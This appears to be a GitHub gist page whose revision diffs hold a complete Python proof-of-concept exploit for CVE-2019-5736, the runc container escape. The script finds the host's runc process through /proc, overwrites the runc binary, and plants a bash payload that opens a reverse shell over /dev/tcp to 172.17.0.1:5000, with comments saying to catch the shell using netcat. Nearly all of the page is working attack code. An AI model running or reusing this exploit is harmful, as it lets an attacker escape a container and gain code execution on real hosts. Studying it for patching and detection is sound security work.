Last active
June 30, 2025 09:54
-
-
Save singe/0ad4078848d85dc0d03f9f9013796e45 to your computer and use it in GitHub Desktop.
Revisions
-
singe revised this gist
Feb 12, 2019 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,5 +1,5 @@ #!/bin/python3 # Silly PoC for CVE-2019-5736 in Python by @singe (with help from @_staaldraad, @frichette_n & @_cablethief) # Target will need a python3 interpreter # Edit IP info below, on the host run a netcat to catch the reverse shell # Run this python file in the container -
Feb 12, 2019 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,57 @@ #!/bin/python3 # Silly PoC for CVE-2019-5736 in Python by @singe (with help from @frichette_n & @_cablethief) # Target will need a python3 interpreter # Edit IP info below, on the host run a netcat to catch the reverse shell # Run this python file in the container # Then from the host: docker exec -i <container name> /tmp/evil import os import stat host='172.17.0.1' port='5000' payload=f'#!/bin/bash\necho "exec 5<>/dev/tcp/{host}/{port} && cat <&5|/bin/bash 2>&5 >&5"|/bin/bash\n' target_file='/tmp/evil' if __name__ == '__main__': with open(target_file,'w') as evil: evil.write('#!/proc/self/exe --criu') os.chmod(target_file,stat.S_IXOTH) found = 0 while found == 0: procs = os.popen('ps -A -o pid') for pid in procs: pid = pid.strip() if pid == 'PID': continue if int(pid) > os.getpid(): try: with open(f'/proc/{pid}/cmdline','r') as cmdline: if cmdline.read().find('runc') >= 0: found = pid except FileNotFoundError: continue except ProcessLookupError: continue handle = -1 while handle == -1: try: handle = os.open(f'/proc/{found}/exe', os.O_PATH) #/proc/xxx/exe is fd to runcinit except FileNotFoundError: continue except PermissionError: continue print('Got file handle') write_handle = 0; while write_handle == 0: try: write_handle = os.open(f'/proc/self/fd/{str(handle)}',os.O_WRONLY|os.O_TRUNC) except OSError: continue print('Got write handle') result = os.write(write_handle,str.encode(payload)) if result == len(payload): print('Successfully wrote payload') else: print('Could not write')